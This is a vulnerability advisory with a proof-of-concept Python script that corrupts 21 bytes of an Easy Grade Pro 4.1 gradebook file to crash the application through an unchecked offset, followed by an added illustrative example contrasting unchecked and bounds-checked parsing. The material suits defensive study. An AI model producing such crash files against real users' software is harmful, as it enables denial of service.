=============================================================================================================================================
| # Title : Easy Grade Pro 4.1 Malformed .EGP File Triggering Crash |
| # Author : indoushka |
| # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 147.0.4 (64 bits) |
| # Vendor : https://archive.org/embed/egp-collection |
=============================================================================================================================================
[+] Summary : This Python script generates a malformed .EGP gradebook file designed to trigger a crash in Easy Grade Pro 4.1 by corrupting data at a specific offset within the file.
The vulnerability lies in the application's file-parsing logic for its proprietary .EGP format. The parser relies on offsets stored inside the file to reconstruct internal data structures, but it does not validate that those offsets fall within the bounds of the loaded file buffer.
The script loads a legitimate .EGP file as a base template and overwrites 21 bytes at a fixed offset (548) with 0x41 ("A"). Whatever offset field sits in that span is replaced by 0x41 bytes, so the parser derives a position far outside the buffer; when the crafted file is opened, the resulting out-of-bounds read causes an access violation and the application crashes.
This proof of concept demonstrates a local denial-of-service condition caused by missing bounds validation during file parsing. The advisory does not include a crash dump or the faulting instruction, so reproduce it under a debugger and confirm the faulting address before drawing any conclusion beyond a crash.
The script performs several safety checks before creating the crafted file, including:
Verifying the presence of a valid base .EGP file
Ensuring the injection offset is within the file bounds
Expanding the file size if the payload exceeds the original length
After successful execution, the script generates a new file named:
exploit_poc.egp
Opening this file in Easy Grade Pro 4.1 may reproduce the crash associated with the vulnerability.
[+] POC :
import os
import sys

def generate_exploit():
    filename = "exploit_poc.egp"
    base_file = "base.egp"
    try:
        if not os.path.exists(base_file):
            print("[-] Base EGP file not found. Please place a valid 'base.egp' in the same directory.")
            return
        with open(base_file, "rb") as f:
            base_data = bytearray(f.read())
        # Fixed position of the corrupted span and the byte written there
        injection_offset = 548
        payload_size = 21
        payload_char = b"\x41"  # "A"
        if injection_offset >= len(base_data):
            print("[-] Injection offset is outside file size.")
            return
        if injection_offset + payload_size > len(base_data):
            print("[!] Payload exceeds file size, resizing file...")
            base_data.extend(b"\x00" * ((injection_offset + payload_size) - len(base_data)))
        # Overwrite the span in place; everything else in the base file is kept
        payload = payload_char * payload_size
        base_data[injection_offset:injection_offset + payload_size] = payload
        with open(filename, "wb") as f:
            f.write(base_data)
        print("[+] Exploit file created successfully")
        print(f"[+] Output File : {filename}")
        print(f"[+] Injection Offset : {injection_offset}")
        print(f"[+] Payload Size : {payload_size} bytes")
        print("[!] Open the file using Easy Grade Pro 4.1 to test the crash.")
    except Exception as e:
        print(f"[-] Error creating exploit file: {e}")

if __name__ == "__main__":
    generate_exploit()
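The added example below is not part of the advisory or of the PoC author's script. It performs the same byte-level transformation in memory and then shows the class of bug the summary describes against a constructed stand-in for the .EGP layout: the real format is proprietary and not documented here, so the "EGP1" magic, the 4-byte little-endian record-offset field at byte 548, the 600-byte file size and the one-byte record are assumptions for illustration, not facts about Easy Grade Pro. An unchecked lookup follows the in-file offset blindly (Python's IndexError stands in for the native access violation), the checked form rejects it, and a byte diff confirms the PoC changed only the intended span.

```python
import struct

# Values taken from the PoC script above
INJECTION_OFFSET = 548
PAYLOAD_SIZE = 21
PAYLOAD_BYTE = 0x41


def make_base(size=600, record_offset=560):
    """Constructed stand-in for a base .EGP file. The magic, the u32 LE
    record offset at byte 548 and the size are assumptions, not the real
    (undocumented) layout."""
    buf = bytearray(size)
    buf[:4] = b"EGP1"
    struct.pack_into("<I", buf, INJECTION_OFFSET, record_offset)
    return bytes(buf)


def craft(base, offset=INJECTION_OFFSET, size=PAYLOAD_SIZE, byte=PAYLOAD_BYTE):
    """Same transformation as the PoC, in memory: overwrite `size` bytes at
    `offset` with `byte`, zero-padding first if the span runs past the end."""
    if offset >= len(base):
        raise ValueError(f"offset {offset} is outside the {len(base)}-byte file")
    data = bytearray(base)
    end = offset + size
    if end > len(data):
        data.extend(b"\x00" * (end - len(data)))
    data[offset:end] = bytes([byte]) * size
    return bytes(data)


def read_offset(buf, pos):
    """Little-endian u32, as a parser would read the in-file offset field."""
    return struct.unpack_from("<I", buf, pos)[0]


def unchecked_lookup(buf, pos):
    """Parser that trusts the in-file offset. On the crafted file the field
    reads 0x41414141 and indexing raises IndexError; the native equivalent
    is an out-of-bounds read and an access violation."""
    rec = read_offset(buf, pos)
    return buf[rec]


def checked_lookup(buf, pos, record_len=1):
    """Hardened form: validate the offset against the buffer before use.
    Written as a subtraction so the same check does not wrap in fixed-width
    C arithmetic, where rec + record_len could overflow."""
    rec = read_offset(buf, pos)
    if record_len > len(buf) or rec > len(buf) - record_len:
        raise ValueError(f"record offset {rec:#x} exceeds file size {len(buf)}")
    return buf[rec:rec + record_len]


def changed_bytes(a, b):
    """Positions where two files differ, to confirm the PoC touched only the
    intended span (and to spot an accidental resize)."""
    def at(s, i):
        return s[i] if i < len(s) else None
    return [i for i in range(max(len(a), len(b))) if at(a, i) != at(b, i)]


if __name__ == "__main__":
    base = make_base()
    crafted = craft(base)
    print(f"field at {INJECTION_OFFSET}: base={read_offset(base, INJECTION_OFFSET):#x} "
          f"crafted={read_offset(crafted, INJECTION_OFFSET):#x}")
    diff = changed_bytes(base, crafted)
    print(f"changed bytes: {diff[0]}..{diff[-1]} ({len(diff)} total)")
    for name, fn in (("unchecked", unchecked_lookup), ("checked", checked_lookup)):
        try:
            fn(crafted, INJECTION_OFFSET)
            print(f"{name}: ok")
        except (IndexError, ValueError) as e:
            print(f"{name}: {type(e).__name__}: {e}")
```

Run `changed_bytes()` against the real base.egp and exploit_poc.egp produced by the PoC to confirm that only bytes 548 through 568 differ; any other difference means the base file was shorter than 569 bytes and was zero-padded, which changes what the parser sees beyond the payload.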
Greetings to :==============================================================================
jericho * Larry W. Cashdollar * r00t * Yougharta Ghenai * Malvuln (John Page aka hyp3rlinx)|
============================================================================================